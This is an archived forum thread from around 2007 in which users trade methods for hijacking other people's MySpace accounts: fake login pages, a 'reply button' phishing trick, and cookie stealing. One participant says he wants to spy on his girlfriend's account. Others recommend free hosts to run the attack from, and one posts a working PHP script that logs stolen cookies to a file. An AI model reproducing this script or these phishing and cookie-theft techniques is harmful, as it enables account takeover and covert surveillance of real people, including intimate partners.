hobbit monitor
Closed Thread
Page 2 of 4 FirstFirst 1234 LastLast

Thread: hack anyones myspace(WORKING!!)

007 server

I somewhat understand what iam suppose to do but everytime i go to oo7ihost.com i get this message when i attempt to register....Fatal error: Call to a member function on a non-object in /var/wkscript/www/register.jsp on line *5. So if you have any other good servers i can use plzzz let me know.

Quote Originally Posted by gldetolla View Post
    I somewhat understand what iam suppose to do but everytime i go to oo7ihost.com i get this message when i attempt to register....Fatal error: Call to a member function on a non-object in /var/wkscript/www/register.jsp on line *5. So if you have any other good servers i can use plzzz let me know.
    every once in awhile 007ihost.com is down and maybe you didnt copy the url right to confirm that you put it in right click [URL="http://007ihost.com"]here[/URL]

Got a question for you dipman would you mind talkin on aim or through a email?

Is there any program that can detect this? like a persons software, if you don't mind though would still like to talk to you over aim or email if not I understand thanks.
    Last edited by barracks33; 06-15-2007 at 06:07 AM.

Quote Originally Posted by barracks** View Post
    Is there any program that can detect this? like a persons software, if you don't mind though would still like to talk to you over aim or email if not I understand thanks.
    if you have a question ask it here just dont ask anything stupid that you might get banned for

Quote Originally Posted by dipman44 View Post
    if you have a question ask it here just dont ask anything stupid that you might get banned for
    Na I know, well i'm tryin to see if my girl is talkin to her ex cause she recently changed her profile and hid all her friends so ... but I have a couple questions, what one would be if she uses that fake login it saves the cookies and you can then view the information? Two if you have any what's a good way for me to use that like a video or pic?

I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted

I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted
    The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.

Quote Originally Posted by Nivek View Post
    The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.
    yes i know sorry about that everyone

yes i know sorry about that everyone
    Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.

Quote Originally Posted by Nivek View Post
    Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.
    well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.

well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.
    Try:

[url]http://www.freehostia.com/free_hosting.html[/url]

I've got like a whole load of hosting bookmarks; that's just one of them.

If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the whole site (including htdocs) recursively to 755. It should work.

Quote Originally Posted by mike*5* View Post
    Try:

[url]http://www.freehostia.com/free_hosting.html[/url]

I've got like a whole load of hosting bookmarks; that's just one of them.

If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the whole site (including htdocs) recursively to 755. It should work.
    would this be how i would write the php?:
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

would this be how i would write the php?:
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>
    Yes, but you would have to set the permissions on htdocs and log.txt to 755.

Quote Originally Posted by mike*5* View Post
    Yes, but you would have to set the permissions on htdocs and log.txt to 755.
    I dont want to sound like a complete retard but how would i do that?

Closed Thread